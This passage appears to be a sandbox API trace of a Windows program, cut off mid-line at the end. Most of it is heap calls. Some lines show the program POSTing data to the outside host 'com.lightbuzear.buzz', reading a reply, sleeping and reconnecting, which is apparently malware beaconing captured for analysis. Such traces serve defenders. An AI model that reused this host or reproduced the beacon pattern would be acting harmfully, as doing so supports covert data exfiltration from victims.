[0259.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0259.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0259.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0259.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c80 [0259.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0259.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c98 [0259.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c80 | out: hHeap=0x4780000) returned 1 [0259.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0259.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0259.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815c80 [0259.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48002f8 [0259.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48002f8 | out: hHeap=0x4780000) returned 1 [0259.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0259.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800230 [0259.916] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0259.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800280 [0259.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0259.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0259.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0259.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0259.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0259.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0259.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0259.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0259.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0259.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c98 [0259.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0259.916] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815608 [0259.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0259.917] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0259.917] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815608 | out: hHeap=0x4780000) returned 1 [0259.917] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815608 [0259.917] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48002a8 [0259.917] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48002a8 | out: hHeap=0x4780000) returned 1 [0259.917] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0259.917] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0259.918] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0259.918] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0259.918] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0259.918] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0259.918] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0259.918] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0259.918] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0259.918] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0259.918] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0259.918] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eda8 [0259.918] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0259.918] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ec28 [0259.918] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eda8 | out: hHeap=0x4780000) returned 1 [0259.918] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0259.918] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0259.918] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48002a8 [0259.918] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0259.918] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0259.918] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48002a8 | out: hHeap=0x4780000) returned 1 [0259.918] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48002a8 [0259.918] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0259.918] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48002f8 [0259.919] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0259.919] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0259.919] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0259.919] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0259.920] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48002f8 | out: hHeap=0x4780000) returned 1 [0259.920] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0259.920] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0259.920] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0259.920] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0259.920] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0259.920] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0259.920] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0259.920] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0259.920] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0259.920] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eac0 [0259.920] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0259.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ec28 [0259.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eac0 | out: hHeap=0x4780000) returned 1 [0259.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0259.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0259.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800460 [0259.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0259.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0259.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800460 | out: hHeap=0x4780000) returned 1 [0259.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48002f8 [0259.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0259.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800460 [0259.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0259.922] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0259.922] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0259.922] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0261.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800460 | out: hHeap=0x4780000) returned 1 [0261.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0261.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0261.307] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0261.307] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0261.307] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0261.307] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0261.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0261.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0261.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0261.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0261.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0261.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0261.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ec28 [0261.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0261.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eda8 [0261.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0261.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0261.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eda8 | out: hHeap=0x4780000) returned 1 [0261.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800460 [0261.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0261.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0261.309] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800460 | out: hHeap=0x4780000) returned 1 [0261.309] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800460 [0261.309] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0261.309] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800690 [0261.309] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0261.309] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0261.310] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0261.310] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0261.310] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800690 | out: hHeap=0x4780000) returned 1 [0261.311] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0261.311] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0261.311] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0261.311] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0261.311] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0261.311] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0261.311] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0261.311] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0261.311] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0261.311] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0261.311] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eda8 [0261.311] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0261.311] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ec28 [0261.311] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eda8 | out: hHeap=0x4780000) returned 1 [0261.311] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0261.312] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0261.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800578 [0261.312] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0261.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd68 [0261.312] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800578 | out: hHeap=0x4780000) returned 1 [0261.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800758 [0261.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0261.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48005c8 [0261.312] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0261.312] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0261.313] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0261.313] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0261.313] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48005c8 | out: hHeap=0x4780000) returned 1 [0261.313] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0261.313] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0261.313] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0261.313] FreeLibrary (hLibModule=0x71570000) returned 1 [0261.313] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0261.313] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0261.314] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800280 | out: hHeap=0x4780000) returned 1 [0261.314] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800230 | out: hHeap=0x4780000) returned 1 [0261.314] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48001e0 | out: hHeap=0x4780000) returned 1 [0261.314] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0261.314] Sleep (dwMilliseconds=0x2710) [0261.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0261.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0261.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0261.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0261.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0261.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0261.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0261.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0261.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0261.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ec28 [0261.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0261.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eda8 [0261.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0261.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0261.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eda8 | out: hHeap=0x4780000) returned 1 [0261.330] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482eda8 [0261.330] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0261.330] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0261.330] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0261.330] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0261.330] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0261.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0261.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0261.331] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0261.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0261.331] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0261.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0261.331] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0261.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0261.331] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0261.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ec28 [0261.331] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0261.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c98 [0261.331] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0261.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0261.331] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0261.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48001e0 [0261.331] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0261.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0261.331] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48001e0 | out: hHeap=0x4780000) returned 1 [0261.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48001e0 [0261.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0261.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800230 [0261.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0261.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0261.332] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0261.332] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0261.333] FreeLibrary (hLibModule=0x71780000) returned 1 [0261.333] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800230 | out: hHeap=0x4780000) returned 1 [0261.333] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0261.333] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800230 [0261.333] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0261.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0261.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0261.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0261.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0261.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0261.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0261.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0261.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0261.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0261.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c98 [0261.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0261.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815530 [0261.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0261.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0261.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815530 | out: hHeap=0x4780000) returned 1 [0261.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815530 [0261.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800280 [0261.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800280 | out: hHeap=0x4780000) returned 1 [0261.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0261.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800280 [0261.335] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0261.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48005a0 [0261.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0261.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0261.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0261.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0261.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0261.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0261.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0261.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0261.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0261.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a40 [0261.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: 